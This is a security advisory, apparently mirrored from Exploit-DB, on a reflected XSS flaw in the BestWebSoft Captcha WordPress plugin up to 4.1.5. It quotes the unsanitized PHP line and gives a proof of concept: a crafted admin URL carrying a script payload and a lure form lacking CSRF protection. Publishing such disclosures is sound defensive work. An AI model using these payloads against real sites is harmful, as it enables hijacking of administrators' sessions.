BWS Captcha Multiple Vulnerabilities

vendor:

Captcha

by:

Colette Chamberland

7,5

CVSS

HIGH

Unsanitized input in whitelist.php

CWE

Product Name: Captcha

Affected Version From: <=4.1.5

Affected Version To: <=4.1.5

Patch Exists: YES

Related CWE: None

CPE: a:bestwebsoft:captcha

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WordPress 4.2.x

2016

BWS Captcha Multiple Vulnerabilities

The variable can be passed in using a get as well as a post. An attacker could send unsuspecting authenticated admin a url crafted like such: http://wwww.victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist&s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E or they can send a form (no CSRF token check) <form method="post" action="http://victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist"><input type="hidden" name="s" value="<script>alert(1);</script>"><input type="submit" name="Search IP" value="Click here to claim your prize!"></form> and it would execute XSS as long as they were logged in to the site.

Mitigation:

Sanitize user input and validate it before using it in the application.

Source

Exploit-DB raw data:

* Exploit Title: BWS Captcha Multiple Vulnerabilities
* Discovery Date:12.03.2015
* Public Disclosure Date:03.10.2016
* Exploit Author: Colette Chamberland
* Contact: colette@wordfence.com
* Vendor Homepage: http://bestwebsoft.com/
* Software Link: https://wordpress.org/plugins/captcha/
* Version:  <=4.1.5
* Tested on: Wordpress 4.2.x
* Category: Wordpress
* CVE: Requested but none received
 
Description
================================================================================
Unsanitized input in whitelist.php:

297: $message = __( 'Search results for', $this->textdomain ) . '&nbsp;:&nbsp;' . $_REQUEST['s'];

 
PoC
================================================================================
The variable can be passed in using a get as well as a post. An attacker
could send unsuspecting authenticated admin a url crafted like such:

http://wwww.victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist&s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

or they can send a form (no CSRF token check)

<form method="post" action="http://victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist">
<input type="hidden" name="s" value="<script>alert(1);</script>">
<input type="submit" name="Search IP" value="Click here to claim your prize!">
</form>

and it would execute XSS as long as they were logged in to the site.